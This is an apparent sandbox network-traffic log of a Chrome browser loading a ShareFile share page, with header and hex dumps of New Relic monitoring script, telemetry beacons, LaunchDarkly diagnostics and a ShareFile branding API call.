                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:28 UTC526INHTTP/1.1 204 No Content
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:28 GMT
                                                                                                                                                                                                                      Content-Type: application/json
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Access-Control-Allow-Headers: Accept,Content-Type,Content-Length,Accept-Encoding,X-LaunchDarkly-Event-Schema,X-LaunchDarkly-User-Agent,X-LaunchDarkly-Payload-ID,X-LaunchDarkly-Wrapper,X-LaunchDarkly-Tags
                                                                                                                                                                                                                      Access-Control-Allow-Methods: POST,OPTIONS
                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                      Access-Control-Expose-Headers: Date
                                                                                                                                                                                                                      Access-Control-Max-Age: 300
                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      144192.168.2.1753611162.247.243.394437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:29 UTC363OUTGET /nr-spa-1216.min.js HTTP/1.1
                                                                                                                                                                                                                      Host: js-agent.newrelic.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:29 UTC549INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Length: 50049
                                                                                                                                                                                                                      Last-Modified: Wed, 18 Oct 2023 21:31:16 GMT
                                                                                                                                                                                                                      ETag: "63e2df852d15ab21d7ff8fc4363222e8"
                                                                                                                                                                                                                      Cache-Control: public, max-age=31536000, stale-while-revalidate=86400, stale-if-error=86400
                                                                                                                                                                                                                      Content-Type: application/javascript
                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:29 GMT
                                                                                                                                                                                                                      X-Served-By: cache-dfw-kdfw8210116-DFW
                                                                                                                                                                                                                      X-Cache: HIT
                                                                                                                                                                                                                      X-Cache-Hits: 2
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                      Strict-Transport-Security: max-age=300
                                                                                                                                                                                                                      2024-11-05 19:36:29 UTC1378INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 2c 65 29 7b 66 75 6e 63 74 69 6f 6e 20 72 28 65 2c 6f 29 7b 69 66 28 21 6e 5b 65 5d 29 7b 69 66 28 21 74 5b 65 5d 29 7b 76 61 72 20 61 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 5f 5f 6e 72 5f 72 65 71 75 69 72 65 26 26 5f 5f 6e 72 5f 72 65 71 75 69 72 65 3b 69 66 28 21 6f 26 26 61 29 72 65 74 75 72 6e 20 61 28 65 2c 21 30 29 3b 69 66 28 69 29 72 65 74 75 72 6e 20 69 28 65 2c 21 30 29 3b 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 43 61 6e 6e 6f 74 20 66 69 6e 64 20 6d 6f 64 75 6c 65 20 27 22 2b 65 2b 22 27 22 29 7d 76 61 72 20 73 3d 6e 5b 65 5d 3d 7b 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 74 5b 65 5d 5b 30 5d 2e 63 61 6c 6c 28 73 2e 65 78 70 6f 72 74 73 2c 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76
                                                                                                                                                                                                                      Data Ascii: !function(t,n,e){function r(e,o){if(!n[e]){if(!t[e]){var a="function"==typeof __nr_require&&__nr_require;if(!o&&a)return a(e,!0);if(i)return i(e,!0);throw new Error("Cannot find module '"+e+"'")}var s=n[e]={exports:{}};t[e][0].call(s.exports,function(n){v
                                                                                                                                                                                                                      2024-11-05 19:36:29 UTC1378INData Raw: 6e 3a 74 2c 6d 61 78 3a 74 2c 73 6f 73 3a 74 2a 74 2c 63 3a 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 64 28 74 2c 6e 2c 65 2c 72 29 7b 67 5b 74 5d 7c 7c 28 67 5b 74 5d 3d 7b 7d 29 3b 76 61 72 20 69 3d 67 5b 74 5d 5b 6e 5d 3b 72 65 74 75 72 6e 20 69 7c 7c 28 69 3d 67 5b 74 5d 5b 6e 5d 3d 7b 70 61 72 61 6d 73 3a 65 7c 7c 7b 7d 7d 2c 72 26 26 28 69 2e 63 75 73 74 6f 6d 3d 72 29 29 2c 69 7d 66 75 6e 63 74 69 6f 6e 20 6c 28 74 2c 6e 29 7b 72 65 74 75 72 6e 20 6e 3f 67 5b 74 5d 26 26 67 5b 74 5d 5b 6e 5d 3a 67 5b 74 5d 7d 66 75 6e 63 74 69 6f 6e 20 68 28 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 7b 7d 2c 65 3d 22 22 2c 72 3d 21 31 2c 69 3d 30 3b 69 3c 74 2e 6c 65 6e 67 74 68 3b 69 2b 2b 29 65 3d 74 5b 69 5d 2c 6e 5b 65 5d 3d 70 28 67 5b 65 5d 29 2c 6e 5b 65 5d 2e 6c 65
                                                                                                                                                                                                                      Data Ascii: n:t,max:t,sos:t*t,c:1}}function d(t,n,e,r){g[t]||(g[t]={});var i=g[t][n];return i||(i=g[t][n]={params:e||{}},r&&(i.custom=r)),i}function l(t,n){return n?g[t]&&g[t][n]:g[t]}function h(t){for(var n={},e="",r=!1,i=0;i<t.length;i++)e=t[i],n[e]=p(g[e]),n[e].le
                                                                                                                                                                                                                      2024-11-05 19:36:29 UTC1378INData Raw: 32 30 30 29 29 7d 76 61 72 20 64 3d 74 28 31 39 29 2c 6c 3d 74 28 31 30 29 2c 68 3d 74 28 32 29 2c 70 3d 74 28 32 31 29 2c 6d 3d 74 28 32 35 29 2c 76 3d 74 28 35 32 29 2c 67 3d 74 28 22 6c 6f 61 64 65 72 22 29 2c 79 3d 74 28 22 68 61 6e 64 6c 65 22 29 2c 78 3d 74 28 34 35 29 2c 77 3d 74 28 34 39 29 2c 62 3d 30 2c 54 3d 78 2e 67 65 74 43 6f 6e 66 69 67 75 72 61 74 69 6f 6e 28 22 73 73 6c 22 29 3d 3d 3d 21 31 3f 22 68 74 74 70 22 3a 22 68 74 74 70 73 22 3b 6c 2e 6f 6e 28 22 6a 73 65 72 72 6f 72 73 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 7b 62 6f 64 79 3a 68 2e 74 61 6b 65 28 5b 22 63 6d 22 2c 22 73 6d 22 5d 29 7d 7d 29 2c 64 28 22 73 74 6f 72 65 4d 65 74 72 69 63 22 2c 72 2c 22 61 70 69 22 29 2c 64 28 22 73 74 6f 72 65 45 76 65 6e 74 4d 65
                                                                                                                                                                                                                      Data Ascii: 200))}var d=t(19),l=t(10),h=t(2),p=t(21),m=t(25),v=t(52),g=t("loader"),y=t("handle"),x=t(45),w=t(49),b=0,T=x.getConfiguration("ssl")===!1?"http":"https";l.on("jserrors",function(){return{body:h.take(["cm","sm"])}}),d("storeMetric",r,"api"),d("storeEventMe
                                                                                                                                                                                                                      2024-11-05 19:36:29 UTC1378INData Raw: 2f 2c 69 3d 2f 28 5b 5e 3f 23 5d 2a 29 28 29 2e 2a 2f 3b 6e 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 29 7b 72 65 74 75 72 6e 20 74 2e 72 65 70 6c 61 63 65 28 6e 3f 72 3a 69 2c 22 24 31 24 32 22 29 7d 7d 2c 7b 7d 5d 2c 36 3a 5b 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 2c 65 29 7b 66 75 6e 63 74 69 6f 6e 20 72 28 74 2c 6e 29 7b 76 61 72 20 65 3d 74 5b 31 5d 3b 6f 28 6e 5b 65 5d 2c 66 75 6e 63 74 69 6f 6e 28 6e 2c 65 29 7b 76 61 72 20 72 3d 74 5b 30 5d 2c 69 3d 65 5b 30 5d 3b 69 66 28 69 3d 3d 3d 72 29 7b 76 61 72 20 6f 3d 65 5b 31 5d 2c 61 3d 74 5b 33 5d 2c 73 3d 74 5b 32 5d 3b 6f 2e 61 70 70 6c 79 28 61 2c 73 29 7d 7d 29 7d 76 61 72 20 69 3d 74 28 22 65 65 22 29 2c 6f 3d 74 28 35 32 29 2c 61 3d 74 28 31 39 29 2e 68 61 6e 64 6c 65 72 73 3b
                                                                                                                                                                                                                      Data Ascii: /,i=/([^?#]*)().*/;n.exports=function(t,n){return t.replace(n?r:i,"$1$2")}},{}],6:[function(t,n,e){function r(t,n){var e=t[1];o(n[e],function(n,e){var r=t[0],i=e[0];if(i===r){var o=e[1],a=t[3],s=t[2];o.apply(a,s)}})}var i=t("ee"),o=t(52),a=t(19).handlers;
                                                                                                                                                                                                                      2024-11-05 19:36:29 UTC1378INData Raw: 74 75 72 65 22 29 29 7d 3b 76 61 72 20 61 3d 6e 2e 65 78 70 6f 72 74 73 2e 61 63 74 69 76 65 3d 7b 7d 7d 2c 7b 7d 5d 2c 39 3a 5b 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 2c 65 29 7b 66 75 6e 63 74 69 6f 6e 20 72 28 74 2c 6e 2c 65 29 7b 74 68 69 73 2e 6c 6f 61 64 65 72 3d 74 2c 74 68 69 73 2e 65 6e 64 70 6f 69 6e 74 3d 6e 2c 74 68 69 73 2e 6f 70 74 73 3d 65 7c 7c 7b 7d 2c 74 68 69 73 2e 73 74 61 72 74 65 64 3d 21 31 2c 74 68 69 73 2e 74 69 6d 65 6f 75 74 48 61 6e 64 6c 65 3d 6e 75 6c 6c 7d 76 61 72 20 69 3d 74 28 31 30 29 2c 6f 3d 74 28 32 35 29 3b 6e 2e 65 78 70 6f 72 74 73 3d 72 2c 72 2e 70 72 6f 74 6f 74 79 70 65 2e 73 74 61 72 74 54 69 6d 65 72 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 29 7b 74 68 69 73 2e 69 6e 74 65 72 76 61 6c 3d 74 2c 74 68 69 73 2e 73 74
                                                                                                                                                                                                                      Data Ascii: ture"))};var a=n.exports.active={}},{}],9:[function(t,n,e){function r(t,n,e){this.loader=t,this.endpoint=n,this.opts=e||{},this.started=!1,this.timeoutHandle=null}var i=t(10),o=t(25);n.exports=r,r.prototype.startTimer=function(t,n){this.interval=t,this.st
                                                                                                                                                                                                                      2024-11-05 19:36:29 UTC1378INData Raw: 72 28 74 29 7b 69 66 28 74 2e 69 6e 66 6f 2e 62 65 61 63 6f 6e 29 7b 74 2e 69 6e 66 6f 2e 71 75 65 75 65 54 69 6d 65 26 26 53 2e 73 74 6f 72 65 28 22 6d 65 61 73 75 72 65 73 22 2c 22 71 74 22 2c 7b 76 61 6c 75 65 3a 74 2e 69 6e 66 6f 2e 71 75 65 75 65 54 69 6d 65 7d 29 2c 74 2e 69 6e 66 6f 2e 61 70 70 6c 69 63 61 74 69 6f 6e 54 69 6d 65 26 26 53 2e 73 74 6f 72 65 28 22 6d 65 61 73 75 72 65 73 22 2c 22 61 70 22 2c 7b 76 61 6c 75 65 3a 74 2e 69 6e 66 6f 2e 61 70 70 6c 69 63 61 74 69 6f 6e 54 69 6d 65 7d 29 2c 6a 2e 6d 65 61 73 75 72 65 28 22 62 65 22 2c 22 73 74 61 72 74 74 69 6d 65 22 2c 22 66 69 72 73 74 62 79 74 65 22 29 2c 6a 2e 6d 65 61 73 75 72 65 28 22 66 65 22 2c 22 66 69 72 73 74 62 79 74 65 22 2c 22 6f 6e 6c 6f 61 64 22 29 2c 6a 2e 6d 65 61 73 75
                                                                                                                                                                                                                      Data Ascii: r(t){if(t.info.beacon){t.info.queueTime&&S.store("measures","qt",{value:t.info.queueTime}),t.info.applicationTime&&S.store("measures","ap",{value:t.info.applicationTime}),j.measure("be","starttime","firstbyte"),j.measure("fe","firstbyte","onload"),j.measu
                                                                                                                                                                                                                      2024-11-05 19:36:29 UTC1378INData Raw: 3d 73 3f 6e 75 6c 6c 3a 73 29 29 3b 76 61 72 20 75 3d 77 2e 66 72 6f 6d 41 72 72 61 79 28 69 2c 74 2e 6d 61 78 42 79 74 65 73 29 3b 54 2e 6a 73 6f 6e 70 28 49 2b 22 3a 2f 2f 22 2b 74 2e 69 6e 66 6f 2e 62 65 61 63 6f 6e 2b 22 2f 22 2b 72 2b 22 2f 22 2b 74 2e 69 6e 66 6f 2e 6c 69 63 65 6e 73 65 4b 65 79 2b 75 2c 55 29 7d 7d 7d 66 75 6e 63 74 69 6f 6e 20 69 28 74 29 7b 76 61 72 20 6e 3d 79 28 4f 2c 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 73 28 6e 2c 74 2c 7b 75 6e 6c 6f 61 64 3a 21 30 7d 29 7d 29 3b 72 65 74 75 72 6e 20 45 28 6e 2c 6f 29 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 74 2c 6e 29 7b 72 65 74 75 72 6e 20 74 7c 7c 6e 7d 66 75 6e 63 74 69 6f 6e 20 61 28 74 2c 6e 29 7b 66 6f 72 28 76 61 72 20 65 3d 76 28 29 2c 72 3d 76 28 29 2c 69 3d 4f 5b
                                                                                                                                                                                                                      Data Ascii: =s?null:s));var u=w.fromArray(i,t.maxBytes);T.jsonp(I+"://"+t.info.beacon+"/"+r+"/"+t.info.licenseKey+u,U)}}}function i(t){var n=y(O,function(n){return s(n,t,{unload:!0})});return E(n,o)}function o(t,n){return t||n}function a(t,n){for(var e=v(),r=v(),i=O[
                                                                                                                                                                                                                      2024-11-05 19:36:29 UTC1378INData Raw: 65 2e 62 6f 64 79 2c 6e 2e 6d 61 78 42 79 74 65 73 29 29 29 2c 6c 7d 66 75 6e 63 74 69 6f 6e 20 64 28 74 2c 6e 29 7b 6e 3d 6e 7c 7c 7b 7d 3b 76 61 72 20 65 2c 72 3b 69 66 28 6e 2e 6e 65 65 64 52 65 73 70 6f 6e 73 65 29 7b 69 66 28 21 5f 29 72 65 74 75 72 6e 21 31 3b 72 3d 21 30 2c 65 3d 54 2e 78 68 72 7d 65 6c 73 65 20 69 66 28 6e 2e 75 6e 6c 6f 61 64 29 72 3d 50 2c 65 3d 50 3f 54 2e 62 65 61 63 6f 6e 3a 54 2e 69 6d 67 3b 65 6c 73 65 20 69 66 28 5f 29 72 3d 21 30 2c 65 3d 54 2e 78 68 72 3b 65 6c 73 65 7b 69 66 28 22 65 76 65 6e 74 73 22 21 3d 3d 74 26 26 22 6a 73 65 72 72 6f 72 73 22 21 3d 3d 74 29 72 65 74 75 72 6e 21 31 3b 65 3d 54 2e 69 6d 67 7d 72 65 74 75 72 6e 7b 6d 65 74 68 6f 64 3a 65 2c 75 73 65 42 6f 64 79 3a 72 7d 7d 66 75 6e 63 74 69 6f 6e 20
                                                                                                                                                                                                                      Data Ascii: e.body,n.maxBytes))),l}function d(t,n){n=n||{};var e,r;if(n.needResponse){if(!_)return!1;r=!0,e=T.xhr}else if(n.unload)r=P,e=P?T.beacon:T.img;else if(_)r=!0,e=T.xhr;else{if("events"!==t&&"jserrors"!==t)return!1;e=T.img}return{method:e,useBody:r}}function
                                                                                                                                                                                                                      2024-11-05 19:36:29 UTC1378INData Raw: 74 65 6e 65 72 73 3a 70 2c 67 65 74 53 75 62 6d 69 74 4d 65 74 68 6f 64 3a 64 7d 7d 2c 7b 7d 5d 2c 31 31 3a 5b 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 2c 65 29 7b 76 61 72 20 72 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 72 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 36 5d 3e 3c 64 69 76 3e 3c 2f 64 69 76 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 37 5d 3e 3c 64 69 76 3e 3c 2f 64 69 76 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 38 5d 3e 3c 64 69 76 3e 3c 2f 64 69 76 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 39 5d 3e 3c 64 69 76 3e 3c 2f 64 69 76 3e 3c
                                                                                                                                                                                                                      Data Ascii: teners:p,getSubmitMethod:d}},{}],11:[function(t,n,e){var r=document.createElement("div");r.innerHTML="...[if lte IE 6]><div></div><![endif]-->...[if lte IE 7]><div></div><![endif]-->...[if lte IE 8]><div></div><![endif]-->...[if lte IE 9]><div></div><
                                                                                                                                                                                                                      2024-11-05 19:36:29 UTC1378INData Raw: 74 69 6f 6e 20 72 28 74 2c 6e 29 7b 76 61 72 20 65 3d 74 5b 22 6e 61 76 69 67 61 74 69 6f 6e 22 2b 61 5d 3b 72 65 74 75 72 6e 20 6e 2e 6f 66 3d 65 2c 6f 28 65 2c 65 2c 6e 2c 22 6e 22 29 2c 6f 28 74 5b 75 2b 61 5d 2c 65 2c 6e 2c 22 75 22 29 2c 6f 28 74 5b 63 2b 61 5d 2c 65 2c 6e 2c 22 72 22 29 2c 6f 28 74 5b 75 2b 73 5d 2c 65 2c 6e 2c 22 75 65 22 29 2c 6f 28 74 5b 63 2b 73 5d 2c 65 2c 6e 2c 22 72 65 22 29 2c 6f 28 74 5b 22 66 65 74 63 68 22 2b 61 5d 2c 65 2c 6e 2c 22 66 22 29 2c 6f 28 74 5b 66 2b 61 5d 2c 65 2c 6e 2c 22 64 6e 22 29 2c 6f 28 74 5b 66 2b 73 5d 2c 65 2c 6e 2c 22 64 6e 65 22 29 2c 6f 28 74 5b 22 63 22 2b 64 2b 61 5d 2c 65 2c 6e 2c 22 63 22 29 2c 6f 28 74 5b 22 73 65 63 75 72 65 43 22 2b 64 2b 22 69 6f 6e 22 2b 61 5d 2c 65 2c 6e 2c 22 73 22 29
                                                                                                                                                                                                                      Data Ascii: tion r(t,n){var e=t["navigation"+a];return n.of=e,o(e,e,n,"n"),o(t[u+a],e,n,"u"),o(t[c+a],e,n,"r"),o(t[u+s],e,n,"ue"),o(t[c+s],e,n,"re"),o(t["fetch"+a],e,n,"f"),o(t[f+a],e,n,"dn"),o(t[f+s],e,n,"dne"),o(t["c"+d+a],e,n,"c"),o(t["secureC"+d+"ion"+a],e,n,"s")


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      145192.168.2.1753613162.247.243.294437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:29 UTC1034OUTGET /1/fd14b65b5e?a=594432325&sa=1&v=1216.487a282&t=Unnamed%20Transaction&rst=30200&ck=1&ref=https://averellharriman.sharefile.com/share/view/s3b96c17360cd43e7bdcaf25a23709fd0&be=1223&fe=29207&dc=4653&af=err,xhr,stn,ins,spa&perf=%7B%22timing%22:%7B%22of%22:1730835358296,%22n%22:0,%22f%22:3,%22dn%22:46,%22dne%22:61,%22c%22:61,%22s%22:61,%22ce%22:897,%22rq%22:897,%22rp%22:1193,%22rpe%22:1366,%22dl%22:1198,%22di%22:4565,%22ds%22:4652,%22de%22:4653,%22dc%22:29206,%22l%22:29206,%22le%22:29209%7D,%22navigation%22:%7B%7D%7D&fp=1888&fcp=2388&jsonp=NREUM.setToken HTTP/1.1
                                                                                                                                                                                                                      Host: bam.nr-data.net
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:29 UTC495INHTTP/1.1 200
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Length: 79
                                                                                                                                                                                                                      date: Tue, 05 Nov 2024 19:36:29 GMT
                                                                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                                                                      access-control-expose-headers: Date
                                                                                                                                                                                                                      timing-allow-origin: *
                                                                                                                                                                                                                      set-cookie: JSESSIONID=e768e1339f16edbe; Path=/; Domain=.nr-data.net; Secure; SameSite=None
                                                                                                                                                                                                                      content-type: text/javascript
                                                                                                                                                                                                                      cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                      access-control-allow-methods: GET, POST, PUT, HEAD, OPTIONS
                                                                                                                                                                                                                      access-control-allow-credentials: true
                                                                                                                                                                                                                      x-served-by: cache-dfw-ktki8620077-DFW
                                                                                                                                                                                                                      2024-11-05 19:36:29 UTC79INData Raw: 4e 52 45 55 4d 2e 73 65 74 54 6f 6b 65 6e 28 7b 27 73 74 6e 27 3a 30 2c 27 65 72 72 27 3a 31 2c 27 69 6e 73 27 3a 31 2c 27 73 70 61 27 3a 31 2c 27 73 72 27 3a 30 2c 27 73 72 73 27 3a 30 2c 27 73 74 27 3a 31 2c 27 73 74 73 27 3a 30 7d 29
                                                                                                                                                                                                                      Data Ascii: NREUM.setToken({'stn':0,'err':1,'ins':1,'spa':1,'sr':0,'srs':0,'st':1,'sts':0})


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      146192.168.2.175361552.206.112.1294437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:29 UTC669OUTPOST /events/diagnostic/5f33f5d44f29ea099db90d2a HTTP/1.1
                                                                                                                                                                                                                      Host: events.launchdarkly.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      Content-Length: 677
                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                      Content-Type: application/json
                                                                                                                                                                                                                      X-LaunchDarkly-User-Agent: JSClient/3.1.1
                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Origin: https://averellharriman.sharefile.com
                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:29 UTC677OUTData Raw: 7b 22 6b 69 6e 64 22 3a 22 64 69 61 67 6e 6f 73 74 69 63 2d 63 6f 6d 62 69 6e 65 64 22 2c 22 69 64 22 3a 7b 22 64 69 61 67 6e 6f 73 74 69 63 49 64 22 3a 22 33 31 31 36 33 30 38 30 2d 39 62 61 64 2d 31 31 65 66 2d 39 61 38 34 2d 30 66 37 63 39 62 31 66 36 35 64 30 22 2c 22 73 64 6b 4b 65 79 53 75 66 66 69 78 22 3a 22 62 39 30 64 32 61 22 7d 2c 22 63 72 65 61 74 69 6f 6e 44 61 74 65 22 3a 31 37 33 30 38 33 35 33 38 37 35 30 33 2c 22 64 61 74 61 53 69 6e 63 65 44 61 74 65 22 3a 31 37 33 30 38 33 35 33 36 32 36 39 37 2c 22 64 72 6f 70 70 65 64 45 76 65 6e 74 73 22 3a 30 2c 22 65 76 65 6e 74 73 49 6e 4c 61 73 74 42 61 74 63 68 22 3a 30 2c 22 73 74 72 65 61 6d 49 6e 69 74 73 22 3a 5b 5d 2c 22 73 64 6b 22 3a 7b 22 6e 61 6d 65 22 3a 22 6a 73 2d 63 6c 69 65 6e 74
                                                                                                                                                                                                                      Data Ascii: {"kind":"diagnostic-combined","id":{"diagnosticId":"31163080-9bad-11ef-9a84-0f7c9b1f65d0","sdkKeySuffix":"b90d2a"},"creationDate":1730835387503,"dataSinceDate":1730835362697,"droppedEvents":0,"eventsInLastBatch":0,"streamInits":[],"sdk":{"name":"js-client
                                                                                                                                                                                                                      2024-11-05 19:36:29 UTC543INHTTP/1.1 202 Accepted
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:29 GMT
                                                                                                                                                                                                                      Content-Type: application/json
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Access-Control-Allow-Headers: Accept,Content-Type,Content-Length,Accept-Encoding,X-LaunchDarkly-Event-Schema,X-LaunchDarkly-User-Agent,X-LaunchDarkly-Payload-ID,X-LaunchDarkly-Wrapper,X-LaunchDarkly-Tags
                                                                                                                                                                                                                      Access-Control-Allow-Methods: POST,OPTIONS
                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                      Access-Control-Expose-Headers: Date
                                                                                                                                                                                                                      Access-Control-Max-Age: 300
                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      147192.168.2.175361476.223.1.1664437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:29 UTC1024OUTGET /sf/v3/Accounts/Branding HTTP/1.1
                                                                                                                                                                                                                      Host: averellharriman.sf-api.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      CorrelationId: cAUXre54daziARhMvPEN4Q
                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                      Accept-Language: en
                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      X-SF-ClientCapabilities: HardLock,HardQuota,AthenaSSO
                                                                                                                                                                                                                      Accept: application/json, text/plain, */*
                                                                                                                                                                                                                      X-SF-App: ShareFileWeb
                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                      Origin: https://averellharriman.sharefile.com
                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Cookie: AWSALBTGCORS=2t37hBmHH/xUAMD8VhpSDaQs2iwkYt2pKv0hUomxpoPqoPBJw7lpCG60YyfMDsCCFyVZdKCfZCR6ftPASA5iIwfD1X/nXXdlG3FbVXcK7GNVFNl1uA84JUDHrXkW8mXhYdEmnbW4X/Lx6VG33ifCuRoYokKk3FQZPj5VwzjEw+Ef; AWSALBCORS=CmbaTwmXViZUaPBJPCFu4AzHeJDmpzA22LxmxNBw22a1HgAWTJd2PttFHwa07OLWVYJB/LSY3gNBVravXAv/t6Lxmx4aGPYTQaKUQSZKhAGcaqrnp121745wtpcm
                                                                                                                                                                                                                      2024-11-05 19:36:29 UTC1691INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:29 GMT
                                                                                                                                                                                                                      Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                      Content-Length: 2996
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Set-Cookie: AWSALBTG=VRFlrSq4Ahm1u6cdLaQnkh9gffnBdKgf3hYcGuYRzeM+Ux/d5PaKN1QZiLa8mO/tfMkrMwAjJFNDuBV6n7VDXH4gaDVUt3AbI0MMje3+KHRTg6o9nj+EXttKjWIsv0gUR3r8AL+zphJ7RiPMcjIuwJCyaCLjNSz4NKS+FT9N0mph; Expires=Tue, 12 Nov 2024 19:36:29 GMT; Path=/
